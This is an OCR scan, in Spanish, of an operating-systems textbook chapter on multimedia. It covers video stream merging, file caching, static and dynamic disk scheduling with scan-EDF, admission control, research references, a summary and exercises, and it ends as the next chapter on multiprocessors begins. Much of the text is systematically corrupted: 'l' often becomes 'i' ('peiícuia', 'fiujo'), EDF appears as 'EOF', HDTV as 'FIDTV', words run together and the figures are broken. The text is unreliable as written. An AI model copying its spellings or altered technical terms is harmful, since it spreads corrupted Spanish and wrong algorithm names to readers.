descartar ei bioque de uso menos reciente cuando ésta se iiena, se podría utiiizar una estrategia di¬ 
ferente. Cada peiícuia que tenga un segundo espectador a cierto intervaio AT dei primer espectador 
se puede marcar como que puede coiocarse en caché, y todos sus bioques se pueden coi ocar en ca¬ 
ché hasta que ei segundo espectador (y posibiemente un tercero) ios haya utiiizado. Para otras pe¬ 
iícuias no se utiiiza caché de ningún tipo. 

Esta idea puede iievarse todavía más iejos. En ciertos casos puede ser factibie combinar dos 
fiujos. Suponga que dos usuarios están viendo ia misma peiícuia, pero con un retraso de 10 segun¬ 
dos entre eiios. Es posibie contener ios bioques en ia caché por 10 segundos, pero se desperdicia 
memoria. Un método aiternativo (pero aigo furtivo) es tratar de sincronizar ias dos peiícuias. Para 
iograr esto, hay que cambiar ia veiocidad de cuadro para ambas peiícuias. Esta idea se iiustra en ia 
figura 7-25. 

En ia figura 7.25(a), ambas peiícuias se reproducen a ia veiocidad NTSC de 1800 cuadros/mi¬ 
nuto. Como ei usuario 2 empezó 10 segundos después, continuará con ese desfasamiento de 10 se¬ 
gundos durante toda ia peiícuia. Sin embargo, en ia figura 7-25(b) se reduce ia veiocidad dei fiujo 
dei usuario 1 cuando aparece ei usuario 2. En vez de reproducir 1800 cuadros/minuto, durante ios 
siguientes 3 minutos reproduce 1750 cuadros/minuto. Después de 3 minutos, se encuentra en ei cua¬ 
dro 5550. Además, ei fiujo dei usuario 2 se reproduce a 1850 cuadros/minuto durante ios primeros 
3 minutos, con io cuai también se coioca en ei cuadro 5550. De ese punto en adeiante, ambos fiu¬ 
jos se reproducen a i a veiocidad normai. 

Durante ei periodo de recuperación, ei fiujo dei usuario 1 se reproduce 2.8% más iento y ei fiu¬ 
jo dei usuario 2, 2.8% más rápido. Es poco probabie que ios usuarios detecten esto. Sin embargo, 
si es aigo preocupante, ei periodo de recuperación se puede distribuir en un intervaio mayor a 3 mi¬ 
nutos. 

Una manera aiternativa de reducir ia veiocidad dei fiujo de un usuario para combinario 
con otro fiujo es dar a ios usuarios ia opción de tener comerciaies en sus peiícuias, y ofrecerias 
a un menor costo que ias peiícuias sin comerciaies. Ei usuario también puede eiegir ias catego¬ 
rías de productos, por io que ios comerciaies serán menos intrusivos y tendrán más probabiiida- 
des de ser vistos. Ai manipuiar ei número, ia iongitud y ia sincronización de ios comerciaies, ei 
fiujo se puede retener ei tiempo suficiente como para sincronizarse con ei fiujo deseado (Krish- 
nan, 1999). 
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Figura 7-25. (a) Dos usuarios viendo ia misma peiícuia, desfasados por 10 segundos, 
(b) Combinación de ios dos fiujos en uno. 


7.8.2 C aché de archivo 

La caché también puede ser útil en los sistemas multimedia de una manera distinta. Debido al gran 
tamaño de la mayoría de las películas (3 a 6 GB), es común que los servidores de video no pue¬ 
dan almacenar todas sus películas en disco, por lo que las mantienen en DVD o en cinta. Cuando 
se necesita una película, siempre se puede copiar al disco, pero hay un tiempo de inicio conside¬ 
rable para localizar la película y copiarla al disco. En consecuencia, la mayoría de los servidores de 
video mantienen una caché de disco de las películas más populares, las cuales se guardan comple¬ 
tamente en el disco. 

Otra manera de utilizar la caché es mantener los primeros minutos de cada película en el dis¬ 
co. Deesa forma, cuando se solicite una película, su reproducción podrá empezar de inmediato des¬ 
de el archivo en el disco. Mientras tanto, la película se copiará del DVD o la cinta al disco. Al 
almacenar la cantidad suficiente de la película en el disco en todo momento, es posible tener una 
probabilidad muy alta de que la siguiente pieza de la película se haya obtenido antes de necesitar¬ 
la. Si todo sale bien, toda la película completa estará en el disco mucho antes de necesitarla. Des- 
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pués pasará a la caché y permanecerá en el disco, en caso de que haya más peticiones posteriormen¬ 
te. Si pasa demasiado tiempo sin que haya otra petición, ia peiícuia seeiiminará de ia caché para ha¬ 
cer espacio para una peiícuia más popuiar. 


7.9 PROGRAMACIÓN DE DISCOS PARA MULTIMEDIA 

Ei uso muitimedia impone distintas demandas sobre ios discos que ias apiicaciones tradicionaies 
orientadas a texto, como ios compiiadores o ios procesadores de paiabras. En especiai, ei uso de mui¬ 
timedia demanda una veiocidad de datos en extremo aita y una entrega en tiempo reai de ios datos. 
Nada de esto es irreievante. Además, en ei caso de un servidor de video, hay una presión económica 
en cuanto a que un soio servidor maneje cientos de ciientes ai mismo tiempo. Estos requerimientos 
impactan a todo ei sistema. En ia sección anterior anaiizamos ei sistema de archivos: a continuación 
veremos ia programación de discos para muitimedia. 

7.9.1 Programación de discos estática 

Aunque muitimedia impone enormes demandas tiempo reai y veiocidad de ios datos en todas ias 
partes dei sistema, también tiene una propiedad que hace de su manejo un proceso más sencido que 
ei de un sistema tradicionai: ia predictibiiidad. En un sistema operativo tradicionai, se reaiizan pe¬ 
ticiones de bioques de disco de una manera muy impredecibie. Lo mejor que puede hacer ei subsis¬ 
tema de disco es reaiizar una iectura adeiantada de un bioque para cada archivo abierto. A parte de 
eso, todo io que puede hacer es esperar a que iieguen ias peticiones y procesadas bajo demanda. 
M uitimedia es distinta. Cada fiujo activo impone una carga bien definida en ei sistema, que es muy 
predecibie. Para ia reproducción NTSC, cada 33.3 mseg, cada ciiente desea ei siguiente cuadro en 
su archivo y ei sistema tiene 33.3 mseg para proporcionar todos ios cuadros (ei sistema necesita co- 
iocaren ei búfer por io menos un cuadro por cada fiujo, para queia obtención dei cuadro k + 1 pue¬ 
da proceder en paraieio con ia reproducción dei cuadro k). 

Esta carga predecibie se puede utiiizar para programar ei disco mediante ei uso de aigoritmos 
optimizados para ia operación con muitimedia. A continuación consideraremos sóio un disco, pero 
ia idea se puede apiicar a varios discos también. Para este ejempio vamos a suponer que hay 10 
usuarios, cada uno viendo una peiícuia distinta. Además, supondremos que todas ias peiícuias tie¬ 
nen ia misma resoiución, veiocidad de cuadro y otras propiedades. 

Dependiendo dei resto dei sistema, ia computadora puede tener 10 procesos, uno porcada fiu¬ 
jo de video, o un proceso con 10 hiios, o inciuso un proceso con un hiio que maneje ios 10 fiujos 
por turno rotatorio. Los detaiies no son importantes. Lo que importa es que ei tiempo se divide en 
rondas, en donde una ronda es ei tiempo dei cuadro (33.3 mseg para NTSC, 40 mseg para PAL). 
Ai inicio de cada ronda, se genera una petición de disco para cada usuario, como se muestra en ia 
figura 7-26. 

Después de que iiegan todas ias peticiones ai inicio de ia ronda, ei disco sabe io que tiene que 
hacer durante esa ronda. También sabe que no iiegarán más peticiones sino hasta que se hayan pro¬ 
cesado ias existentes y haya empezado ia siguiente ronda. En consecuencia, puede ordenar ias pe¬ 
ticiones de ia manera óptima, probabiemente por orden deciiindro (aunque tai vez sea por orden de 
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Flujo 


Búfer para cuadros impares 
Búfer para cuadros pares 



Se solicita un bloque 701 92 281 130 326 410 160 466 204 524 


Algoritmo de optimización 


92 130 160 204 281 326 410 466 524 701 

Orden en el que se procesan las peticiones de disco -► 

Figura 7-26. En una ronda, cada película pide un cuadro. 


sector en algunos casos) y después procesarlas en el orden óptimo. En la figura 7-26, las peticiones 
se muestran ordenadas por cilindro. 

En primera instancia, podríamos pensar que no tiene caso optimizar el disco de esta forma, ya 
que mientras el disco cumpla con el tiempo de respuesta, no importa si lo cumple con 1 mseg o 
10 mseg de sobra. No obstante, esta conclusión es falsa. Al optimizar las búsquedas de esta forma, 
el tiempo promedio para procesar cada petición se reduce, lo cual significa que el disco puede ma¬ 
nejar más flujos por ronda en promedio. En otras palabras, al optimizar las peticiones de disco de 
esta forma se incrementa el número de películas que el servidor puede transmitir al mismo tiempo. 
El tiempo de sobra al final de la ronda también se puede utilizar para dar servicio a las peticiones 
que puedan existir y no sean de tiempo real. 

Si un servidor tiene demasiados flujos, de vez en cuando no cumplirá con un tiempo de res¬ 
puesta, cuando se le pida que obtenga cuadros de partes distantes del disco. Pero mientras los tiem¬ 
pos de respuesta que no cumpla ocurran con muy poca frecuencia, pueden tolerarse a cambio de 
manejar más flujos a la vez. Lo que importa aquí es el número de flujos que se van a obtener. Te¬ 
ner dos o más clientes por flujo no afecta al rendimiento del disco ni a la programación. 

Para que el flujo de datos hacia los clientes tenga un movimiento uniforme, se necesita el uso 
de doble búfer en el servidor. Durante la ronda 1 se utiliza un conjunto de búferes, un búfer por flu¬ 
jo. Cuando termina la ronda, se desbloquea(n) el (los) proceso(s) de salida y se le(s) indica que 
transmita(n) el cuadro 1. Al mismo tiempo llegan nuevas peticiones para el cuadro 2 de cada pelí¬ 
cula (podría haber un hilo de disco y un hilo de salida para cada película). Estas peticiones se de¬ 
ben cumplir mediante el uso de un segundo conjunto de búferes, ya que los primeros están todavía 
ocupados. Cuando empieza la ronda 3, el primer conjunto de búferes está libre y se puede reutili¬ 
zar para obtener el cuadro 3. 

Hemos asumido que sólo hay una ronda por cuadro. Esta limitación no es estrictamente nece¬ 
saria. Podría haber dos rondas por cuadro para reducir la cantidad de espacio de búfer requerido, a 
cambio de tener el doble de operaciones de disco. De manera similar, se podrían obtener dos cua- 
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dros del disco por cada ronda (suponiendo que se aimacenen pares de cuadros en forma contigua 
en ei disco). Este diseño recorta ei número de operaciones de disco a ia mitad, a cambio de dupii- 
car ia cantidad de espacio de búfer requerido. Dependiendo de ia disponibiiidad reiativa, ei rendi¬ 
miento y ei costo de memoria en comparación con ia E/S de disco, se puede caicuiar y utiiizar ia 
estrategia óptima. 


7.9.2 Programación de disco dinámica 

En ei ejempio anterior hicimos ia suposición deque todos ios f i uj os tienen ia misma resoiución, ve- 
iocidad de cuadro y otras propiedades. Ahora vamos a retirar esta suposición. Las distintas peiícu- 
ias pueden tener ahora distintas veiocidades de datos, por io que no es posibie tener una ronda cada 
33.3 mseg y obtener un cuadro para cada fiujo. Las peticiones iiegan ai disco más o menos en for¬ 
ma aieatoria. 

Cada petición de iectura especifica qué bioque se debe ieer, y además en qué momento se ne¬ 
cesita este bioque: es decir, ei tiempo de respuesta. En aras de simpiicidad vamos a suponer que ei 
tiempo de servicio actuai para cada petición es ei mismo (aun cuando en definitiva esto no sea cier¬ 
to). De esta forma, podemos restar ei tiempo de servicio fijo a cada petición para obtener ei tiempo 
más retrasado en ei que se puede iniciar ia petición sin dejar de cumpiir con ei tiempo de respues¬ 
ta. Esto simpiifica ei modeio, ya que io que ie preocupa ai programador dei disco es ei tiempo de 
respuesta para programar i a petición. 

Cuando ei sistema se inicia, no hay peticiones de disco pendientes. Cuando iiega ia primera pe¬ 
tición, se atiende de inmediato. M ientras se reaiiza ia primera búsqueda pueden iiegar otras peticio¬ 
nes, por io que cuando termina ia primera petición, ei driver (controiador) de disco puede tener ia 
opción de eiegir ia siguiente petición a procesar. Se seiecciona una petición y se inicia. Cuando se 
compieta esa petición, hay de nuevo un conjunto de peticiones posibies: i as que no se seiecciona- 
ron ia primera vez y ias nuevas peticiones que iiegaron cuando se estaba procesando ia segunda pe¬ 
tición. En generai, cada vez que se compieta una petición de disco, ei driver tiene cierto conjunto 
de peticiones pendientes, de ias cuaies tiene que eiegir una. La pregunta es: ¿Qué aigoritmo utiiiza 
para seiaccionar ia siguiente petición a ia que va a dar servicio?". 

Hay dos factores que participan en iaseiacción de ia siguiente petición de disco: tiempos de res¬ 
puesta y ci i i ndros. Desde ei punto de vista dei rendimiento, ai mantener ias peticiones ordenadas por 
ciiindro y utiiizar ei aigoritmo dei eievador se minimiza ei tiempo totai de búsqueda, pero esto pue¬ 
de provocar que ias peticiones en ios ciiindros periféricos no cumpian con su tiempo de respuesta. 
Desde ei punto de vista de tiempo reai, ai ordenar ias peticiones con base en ei tiempo de respuesta 
y procesadas en ese orden, ei tiempo de respuesta más cercano primero, se minimiza ia probabiiidad 
de no cumpiir con ios tiempos de respuesta pero aumenta ei tiempo totai de búsqueda. 

Estos factores se pueden combinar mediante ei uso dei algoritmo scan-EDF (Reddy y Wyiiie, 
1994). La idea básica de este aigoritmo es recoiectar peticiones cuyos tiempos de entrega estén re- 
iativamente cerca, coiocarias en iotesy procesadas en orden por ciiindro. Como ejempio, conside¬ 
re ia situación de ia figura 7-27 en t = 700. Ei driver de disco sabe que tiene 11 peticiones 
pendientes para varios tiempos de respuesta y varios ciiindros. Por ejempio, podría optar por tratar 
ias cinco peticiones con ios tiempos de respuesta más cercanos como un iote, ordenadas por número 


516 


SISTEMAS OPERATIVOS MULTIMEDIA 


CAPITULO 7 


de cilindro y utilizar el algoritmo del elevador para atenderlas en orden por cilindro. Entonces, el 
orden sería 110, 330, 440, 676 y 680. M ientras que cada petición se complete antes de su tiempo de 
respuesta, las peticiones se podrán volver a ordenar sin problemas para minimizar el tiempo total 
de búsqueda requerido. 


Juntar en un lote 


Cilindro 


Peticiones (ordenadas por tiempo de respuesta) 



330 



110 680 440 ^ 220 755 280 


550 812 103 


........... 

700 710 720 730 740 750 


Tiempo de respuesta (mseg) - 


Figura 7-27. El algoritmo scan-EDF utiliza los tiempos de respuesta y números 
de cilindro para la programación. 

Cuando diferentes flujos tienen distintas velocidades de datos, surge una pregunta importante 
cuando aparece un nuevo cliente: ¿se debe admitir o no? Si la admisión del cliente va a ocasionar 
que otros flujos no cumplan con sus tiempos de respuesta con frecuencia, la respuesta probablemen¬ 
te sea que no. Hay dos formas de calcular si se debe o no admitir el nuevo cliente. Una de ellas es 
asumir que cada cliente necesita cierta cantidad de recursos en promedio: por ejemplo, ancho de 
banda de disco, búferes de memoria, tiempo de la CPU, etc. Si hay suficiente de cada recurso para 
un cliente promedio, se admite el nuevo cliente. 

El otro algoritmo es más detallado. Hace un análisis de la película especifica que desea el nue¬ 
vo cliente y analiza la velocidad de datos (calculada con anterioridad) para esa película, que es dis¬ 
tinta dependiendo de si es en blanco y negro o a color, si es de dibujos animados o filmada con 
actores, e incluso si es una historia de amor o un filme de guerra. Las historias de amor se mueven 
con más lentitud, con escenas largas y desvanecimientos cruzados lentos, todo lo cual se comprime 
sin problema, mientras que los filmes de guerra tienen muchos cortes rápidos y acción violenta, de 
ahí que requieran muchos cuadros I y cuadros P grandes. Si el servidor tiene suficiente capacidad 
para el filme específico que desea el nuevo cliente, entonces se admite el nuevo cliente: en caso con¬ 
trario se le niega el acceso. 


7.10 INVESTIGACIÓN SOBRE MULTIMEDIA 

M ultimedia es un tema de moda, por lo que hay una cantidad considerable de investigación en ese 
campo. Gran parte de esta investigación es sobre el contenido, las herramientas y aplicaciones de 
construcción, todo lo cual está más allá del alcance de este libro. Otro tema popular es multimedia 
y redes, que también está fuera de nuestro alcance. Sin embargo, el trabajo en los servidores de mul¬ 
timedia (en especial los distribuidos) está relacionado con los sistemas operativos (Sarhan y Das, 
2004: M atthur y M undur, 2004: Zaia y colaboradores, 2004). El soporte de los sistemas de archi- 
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vos para multimedia también esterna de investigación en la comunidad de sistemas operativos (Ahn 
y colaboradores, 2004; Cheng y colaboradores, 2005; Kang y colaboradores, 2006; Park y Ohm, 
2006). 

La buena codificación de audio y video (en especial para las aplicaciones en 3D) es importan¬ 
te para un alto rendimiento, por lo que estos temas también están sujetos a investigación (Chatto- 
padhyay y colaboradores, 2006; Mari y colaboradores, 2006; Kum y Mayer-Patel, 2006). 

La calidad del servicio es importante en los sistemas multimedia, por lo que este tema recibe 
algo de atención (Childs e Ingram, 2001; Tamal y colaboradores, 2004). La programación está re¬ 
lacionada con la calidad del servicio, tanto para la CPU (Etsion y colaboradores, 2004; Etsion y co¬ 
laboradores, 2006; Nieh y Lam, 2003; Yuan y Nahrstedt, 2006) como para el disco (Lund y Goebel, 
2003; Reddy y colaboradores, 2005). 

Al transmitir la programación de multimedia a los clientes de paga, la seguridad es importan¬ 
te, por lo que ha estado recibiendo atención (Barni, 2006). 


7.11 RESUMEN 

M ultimedia es un área de aplicación de las computadoras con amplio crecimiento. Debido al gran 
tamaño de los archivos de multimedia y sus estrictos requerimientos de reproducción en tiempo 
real, los sistemas operativos diseñados para texto no son óptimos para multimedia. Los archivos de 
multimedia consisten en varias pistas paralelas, donde por lo general una pista es de video y al me¬ 
nos una de audio, y algunas veces también se incluyen pistas de subtítulos. Todas estas pistas de¬ 
ben estar sincronizadas durante la reproducción. 

Para grabar el audio, se muestrea el volumen en forma periódica, por lo general 44,100 veces- 
/segundo (para el sonido con calidad de CD). Se puede aplicar compresión a la señal de audio, con 
lo cual se obtiene una proporción de compresión uniforme de aproximadamente lOx. La compre¬ 
sión de video utiliza la compresión dentro de cada cuadro (JPEG) y la compresión entre cuadros 
(MPEG). Esta última representa los cuadros P como diferencias respecto al cuadro anterior. Los 
cuadros B se pueden basar en el cuadro anterior o en el siguiente. 

M ulti media necesita de la programación en tiempo real para poder cumplir con sus tiempos de 
respuesta. Comúnmente se utilizan dos algoritmos. El primero es la programación monotónica en 
frecuencia, que es un algoritmo preferente estático que asigna prioridades fijas a los procesos, con 
base en sus periodos. El segundo es el tiempo de respuesta más cercano primero, que es un algorit¬ 
mo dinámico que siempre selecciona el proceso con el tiempo de respuesta más cercano. El algo¬ 
ritmo EDF es más complicado, pero puede obtener 100% de utilización, algo que RM S no puede 
lograr. 

Los sistemas de archivos multimedia utilizan por lo general un modelo de empuje (push) en 
vez de un modelo de extracción (pulí). Una vez que inicia un flujo, los bits llegan del disco sin que 
haya más peticiones por parte del usuario. Este método es bastante distinto al de los sistemas ope¬ 
rativos convencionales, pero se necesita para cumplir con los requerimientos de tiempo real. 

Los archivos se pueden almacenar en forma contigua o no. En el último caso, la unidad puede 
ser de longitud variable (un bloque contiene un cuadro) o de longitud fija (un bloque contiene mu¬ 
chos cuadros). Estos métodos tienen distintas concesiones. 
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La colocación de archivos en el disco afecta al rendimiento. Cuando hay varios archivos, algu¬ 
nas veces se utiliza el algoritmo de órgano de tubos. Es común dividir en bandas los archivos entre 
varios discos, ya sean bandas estrechas o amplias. También se utilizan mucho las estrategias de ca¬ 
ché de bloque y de archivo para mejorar el rendimiento. 


PROBLEMAS 

1. ¿Se puede enviar la televisión NTSC en blanco y negro sin compresión a través de Fast Ethernet? 
De ser así, ¿cuántos canales se pueden enviar a la vez? 

2. HDTV tiene el doble de la resolución horizontal de la TV regular (1280 píxeles, en comparación con 
640 píxeles). Utilizando la información que se proporciona en el texto, ¿cuánto más requiere de an¬ 
cho de banda que la TV estándar? 

3. En la figura 7-3, hay archivos separados para el avance rápido y el retroceso rápido. Si un servidor 
de video intenta dar soporte al movimiento en cámara lenta también, ¿se requiere otro archivo para 
el movimiento en cámara lenta en sentido hacia delante? ¿Qué hay sobre el sentido inverso? 

4. U na señal de sonido se muestrea utilizando un número de 16 bits con signo (1 bit de signo, 15 bits 
de magnitud). ¿Cuál es el máximo ruido de cuantificación en porcentaje? ¿Es esto un problema 
mayor para los conciertos de flauta o los de rock and roll, o es igual para ambos? Explique su res¬ 
puesta. 

5. U n estudio de grabación es capaz de realizar una grabación digital maestra utilizando muestreo de 
20 bits. La distribución final para los oyentes utilizará 16 bits. Sugiera una manera de reducir el efec¬ 
to del ruido de cuantificación, y explique las ventajas y desventajas de su esquema. 

6 . La transformación DCT utiliza un bloque de8 x 8, pero el algoritmo que se utiliza para la compen¬ 
sación de movimiento utiliza un bloque de 16 x 16. ¿Acaso esta diferencia ocasiona problemas, y 
de ser así, cómo se resuelven en M PEG? 

7. En la figura 7-10 vimos cómo funciona MPEG con un fondo estacionario y un actor en movimien¬ 
to. Suponga que se crea un video M PEG a partir de una escena en la que la cámara se monta en un 
trípode y se mueve lentamente de izquierda a derecha, a una velocidad tal que no haya dos cuadros 
consecutivos iguales. ¿Acaso ahora todos los cuadros tienen que ser cuadros I? ¿Por qué si o por 
qué no? 

8 . Suponga que cada uno de los tres procesos en la figura 7-13 va acompañado de un proceso que so¬ 
porta un flujo de audio que opera con el mismo periodo que su proceso de video, por lo que los bú- 
feres de audio se pueden actualizar entre los cuadros de video. Los tres procesos de audio son 
idénticos. ¿Cuánto tiempo de la CPU está disponible para cada ráfaga de un proceso de audio? 

9. Dos procesos de tiempo real se ejecutan en una computadora. El primero se ejecuta cada 25 mseg 
durante 10 mseg. El segundo se ejecuta cada 40 mseg durante 15 mseg. ¿Funcionará siempre RM S 
para estos procesos? 

10. La CPU de un servidor de video tiene una utilización de 65%. ¿Cuántas películas puede mostrar uti¬ 
lizando la programación RM S? 
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11. En la figura 7-15, EOF mantiene ocupada ia CPU 100% dei tiempo, hasta t = 150. No puede man¬ 
tener ocupada ia CPU por un tiempo indefinido, ya que sóio hay 975 mseg de trabajo por segundo 
para hacerio. Extienda ia figura más aiiá de 150 mseg y determine cuándo es ia primera vez que ia 
CPU está inactiva con EOF. 

12. U n DV D puede contener datos suficientes para una peiícuia compieta, y ia veiocidad de transferen¬ 
cia es adecuada para mostrar un programa con caiidad de teievisión. ¿Por qué no podemos utiiizar 
una "granja" de muchas unidades de D V D como ei origen de datos para un servidor de video? 

13. Los operadores de un sistema de video casi bajo demanda han descubierto que ias personas en cier¬ 
ta ciudad no desean esperar más de 6 minutos para que empiece una peiícuia. ¿Cuántosfiujos en pa- 
raieio necesitan para una peiícuia de 3 horas? 

14. Considere un sistema que utiiice ei esquema deA bram-Profeta y Shin, en donde ei operador dei ser¬ 
vidor de video desea que ios Chentes puedan buscar hacia deianteo hacia atrás durante 1 minuto, to¬ 
do ese tiempo en forma iocai. Suponiendo que ei fiujo de video es M PEG-2 a 4 M bps, ¿cuánto 
espacio de búfer debe tener cada ciiente en forma iocai? 

15. Considere ei método de A bram-Profeta y Shin. Si ei usuario tiene una RAM de 50 M B que se pue¬ 
de utiiizar como búfer, ¿cuái es ei vaior de AT con un fiujo de video de 2 M bps? 

16. U n sistema de video bajo demanda para Fl DTV utiiiza ei modeio de bioques pequeños de ia figura 
7-20(a) con un bioque de disco de 1 KB. Si ia resoiución de video es de 1280 x 720 y ei fiujo de 
datos es de 12 M bps, ¿cuánto espacio en disco se desperdicia en ia fragmentación interna, en una 
peiícuia de 2 horas, si se utiiiza NTSC? 

17. Considere ei esquema de asignación de aimacenamiento de ia figura 7-20(a) para NTSC y PAL. Pa¬ 
ra un bioque de disco y un tamaño de peiícuia específicos, ¿acaso uno de ios dos sufre de más frag¬ 
mentación interna que ei otro? De ser así, ¿cuái es mejor y por qué? 

18. Considere ias dos aiternativas que se muestran en ia figura 7-20. ¿Favorece ei cambio hacia FIDTV 
a uno de estos sistemas en vez dei otro? Expiique su respuesta. 

19. Considere un sistema con un bioque de disco de 2 K B que aimacena una peiícuia PA L de 2 horas, 
con un promedio de 16 KB por cuadro. ¿Cuái es ei espacio promedio desperdiciado si se utiiiza ei 
método de aimacenamiento de bioques pequeños de disco? 

20. En ei ejempio anterior, si cada entrada de cuadro requiere 8 bytes, de ios cuaies se utiiiza 1 byte pa¬ 
ra indicar ei número de bioques de disco por cuadro, ¿cuái es ei mayor tamaño posibie de peiícuia 
que se puede aimacenar? 

21. Ei esquema de video casi bajo demanda de Chen y Thapar funciona mejor cuando cada conjunto de 
cuadros tienen ei mismo tamaño. Suponga que se va a mostrar una peiícuia en 24 fiujossimuitáneos, 
y que un cuadro en 10 es un cuadro I. Suponga también que ios cuadros I son 10 veces más gran¬ 
des que ios cuadros P. Los cuadros B son dei mismo tamaño que ios cuadros P. ¿Cuái es ia probabi- 
iidad deque un búfer iguai a 4 cuadros I y 20 cuadros P no sea io bastante grande? ¿Cree usted que 
dicho tamaño de búfer es aceptabie? Para que ei probiema se pueda rastrear mejor, suponga que ios 
tipos de ios cuadros se distribuyen en forma aieatoria e independiente sobre ios fiujos. 

22. Para ei método de Chen y Thapar, dado que 5 pistas requieren 8 cuadros I, 35 pistas requieren 5 cua¬ 
dros 1,45 pistas requieren 3 cuadros I, y 15 cuadros requieren de 1 a 2 cuadros, ¿cuái debería ser ei 
tamaño dei búfer si queremos asegurar que ei búfer pueda contener 95 cuadros? 
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23. Para el método de Chen y Thapar, suponga que una película de 3 horas codificada en formato PAL 
necesita transmitirse en fiujo continuo cada 15 minutos. ¿Cuántos fiujos concurrentes se necesitan? 

24. Ei resuitado finai de ia figura 7-18 es que ei punto de reproducción ya no se encuentra en medio dei 
búfer. Idee un esquema para tener por lo menos 5 minutos detrás del punto de reproducción y 5 mi¬ 
nutos delante de él. Haga cualquier suposición razonable que se requiera, pero establézcala de ma¬ 
nera explícita. 

25. El diseño de la figura 7-19 requiere que se lean todas las pistas de lenguaje en cada cuadro. Supon¬ 
ga que los diseñadores de un servidor de video tienen que soportar una gran cantidad de lenguajes, 
pero no quieren dedicar tanta RA M a los búferes para contener cada cuadro. ¿Qué otras alternativas 
hay disponibles, y cuáles son las ventajas y desventajas de cada una? 

26. U n servidor de video pequeño tiene ocho películas. ¿Qué predice la ley deZipf como las probabili¬ 
dades para la película más popular, la segunda película más popular y así en lo sucesivo, hasta la pe¬ 
lícula menos popular? 

27. U n disco de 14 GB con 1000 cilindros se utiliza para contener 1000 clips de video M PEG-2 de 30 
segundos, que se reproducen a 4 M bps. Se almacenan de acuerdo con el algoritmo de órgano de tu¬ 
bos. Suponiendo la ley deZipf, ¿qué fracción del tiempo invertirá el brazo del disco en los 10 cilin¬ 
dros de en medio? 

28. Suponiendo que la demanda relativa para los filmes A, B, C y D se describe mediante la ley deZipf, 
¿cuál es la utilización relativa esperada de los cuatro discos en la figura 7-24 para los cuatro méto¬ 
dos de división en bandas que se muestran? 

29. Dos clientes de video bajo demanda empezaron a ver la misma película PAL con 6 segundos de di¬ 
ferencia. Si el sistema aumenta la velocidad de un flujo y disminuye la velocidad del otro para que 
se puedan combinar, ¿qué porcentaje de aumento/disminución de velocidad se necesita para combi¬ 
narlos en 3 minutos? 

30. U n servidor de video M PEG-2 utiliza el esquema de rondas de la figura 7-26 para el video NTSC. 
Todos los videos provienen de un solo disco SCSI UltraWidede 10,800 rpm, con un tiempo de bús¬ 
queda promedio de 3 mseg. ¿Cuántos flujos se pueden soportar? 

31. Repita el problema anterior, pero ahora suponga que scan-EDF reduce el tiempo de búsqueda pro¬ 
medio en 20%. ¿Cuántos flujos se pueden soportar ahora? 

32. Considere el siguiente conjunto de peticiones para el disco. Cada petición se representa mediante 
una tupia (Tiempo de respuesta en mseg. Cilindro). Se utiliza el algoritmo scan-EDF, en donde se 
agrupan cuatro tiempos de respuesta próximos y se les da servicio. Si el tiempo promedio para dar 
servicio a cada petición es de 6 mseg, ¿se deja de cumplir un tiempo de respuesta? 

(32, 300): (36, 500): (40, 210): (34, 310) 

Suponga que el tiempo actual es de ISmseg. 

33. Repita el problema anterior una vez más, pero ahora suponga que cada cuadro se divide en bandas 
entre cuatro discos, y el algoritmo scan-EDF proporciona 20% en cada disco. ¿Cuántos flujos se 
pueden soportar ahora? 
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34 . El texto describe el uso de un lote de cinco peticiones de disco para programar la situación descrita 
en la figura 7-27(a). Si todas las peticiones requieren una cantidad de tiempo equitativa, ¿cuál es el 
máximo tiempo por petición permisible en este ejemplo? 

35 . M uchas de las imágenes de mapa de bits que se proporcionan para generar el "papel tapiz" de compu¬ 
tadora utilizan pocos colores y se comprimen con facilidad. U n esquema de compresión simple es el 
siguiente: elegir un valor de datos que no aparezca en el archivo de entrada y utilizarlo como bandera. 
Leer el archivo, byteporbyte, buscando valores de bytes repetidos. Copiar los valores individuales y 
los bytes repetidos hasta tres veces, directamente al archivo de salida. Cuando se encuentre una cade¬ 
na repetida de 4 o más bytes, escribir en el archivo de salida una cadena de tres bytes que consista en 
el byte de bandera, un byte que indique una cuenta de 4 a 255 y el valor actual que se encontró en el 
archivo de entrada. Escriba un programa de compresión que utilice este algoritmo y un programa de 
descompresión que pueda restaurar el archivo original. Crédito adicional: ¿Cómo podemos lidiar con 
los archivos que contienen el byte de bandera en sus datos? 

36 . La animación por computadora se logra al mostrar una secuencia de imágenes ligeramente distintas. 
Escriba un programa para calcular la diferencia, byte por byte, entre dos imágenes de mapa de bits 
descomprimidas con las mismas dimensiones. La salida será del mismo tamaño que los archivos de 
entrada, por supuesto. Utilice este archivo de diferencias como entrada para el programa de compre¬ 
sión del problema anterior, y compare la efectividad de este método con la compresión de imágenes 
individuales. 

37 . Implemente los algoritmos básicos RM S y EOF según su descripción en el texto. La principal entrada 
para el programa será un archivo con varias líneas, en donde cada línea denote la petición de un pro¬ 
ceso para obtener la CPU y tenga los siguientes parámetros: periodo (segundos), tiempo de cómputo 
(segundos), tiempo de inicio (segundos) y tiempo de fin (segundos). Compare los dos algoritmos en 
términos de: (a) número promedio de peticiones de la CPU que se bloquean debido a que la CPU no 
se puede programar; (b) uso promedio de la CPU: (c) tiempo de espera promedio para cada petición 
de la CPU; (d) número promedio de tiempos de respuesta que no se cumplieron. 

38 . Implemento las técnicas de longitud de tiempo constante y longitud de datos constante para almace¬ 
nar archivos de multimedia. La entrada principal para el programaos un conjunto de archivos, en don¬ 
de cada archivo contiene los metadatos acerca de cada cuadro de un archivo de multimedia 
comprimido M PEG-2 (por ejemplo, película). Estos metadatos incluyen el tipo de cuadro (l/P/B), la 
longitud del cuadro, los cuadros de audio asociados, etc. Para distintos tamaños de bloques de archi¬ 
vo, compare las dos técnicas en términos de almacenamiento total requerido, espacio de disco des¬ 
perdiciado y RAM promedio requerida. 

39 . Para el sistema anterior, agregue un programa "lector" que seleccione archivos al azar de la entrada 
anterior para reproducirlos en los modos de video bajo demanda y video casi bajo demanda con fun¬ 
ción de VCR. Implemente el algoritmo scan-EDF para ordenar las peticiones de lectura del disco. 
Compare los esquemas de longitud de tiempo constante y longitud de datos constante en términos 
del número promedio de búsquedas en el disco por cada archivo. 
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Desde su inicio, ia industria de ias computadoras se ha orientado fundamentaimente a buscar sin 
pausa un poder de cómputo cada vez mayor. La ENIAC podía reaiizar 300 operaciones por segun¬ 
do — es decir, era 1000 veces más rápida que cuaiquier caicuiadora anterior a eiia— pero aún así 
ias personas no estaban satisfechas. Las máquinas actuaies son miiiones de veces más rápidas que 
ia ENIAC y sigue existiendo una demanda de mayor potencia de cómputo. Los astrónomos están 
tratando de entender ei universo, ios bióiogos tratan de comprender ias impiicaciones dei genoma 
